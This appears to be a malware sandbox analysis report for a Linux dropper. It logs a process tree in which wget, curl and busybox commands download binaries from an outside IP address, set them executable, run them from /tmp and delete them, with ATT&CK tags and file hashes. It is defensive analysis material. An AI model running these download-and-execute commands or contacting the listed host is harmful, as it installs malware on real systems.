-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1651
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:1652
-
-
/bin/chmodchmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- File and Directory Permissions Modification
PID:1653
-
-
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1654
-
-
/bin/rmrm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:1655
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:1656
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Writes file to tmp directory
PID:1657
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:1658
-
-
/bin/chmodchmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- File and Directory Permissions Modification
PID:1659
-
-
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Executes dropped EXE
PID:1660
-
-
/bin/rmrm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:1661
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:1662
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Writes file to tmp directory
PID:1663
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:1664
-
-
/bin/chmodchmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- File and Directory Permissions Modification
PID:1665
-
-
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Executes dropped EXE
PID:1666
-
-
/bin/rmrm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:1667
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:1668
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Writes file to tmp directory
PID:1669
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:1670
-
-
/bin/chmodchmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- File and Directory Permissions Modification
PID:1671
-
-
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Executes dropped EXE
PID:1672
-
-
/bin/rmrm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:1673
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:1674
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Writes file to tmp directory
PID:1675
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:1676
-
-
/bin/chmodchmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- File and Directory Permissions Modification
PID:1677
-
-
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Executes dropped EXE
PID:1678
-
-
/bin/rmrm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:1679
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:1680
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Writes file to tmp directory
PID:1681
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:1682
-
-
/bin/chmodchmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- File and Directory Permissions Modification
PID:1683
-
-
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Executes dropped EXE
PID:1684
-
-
/bin/rmrm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:1685
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97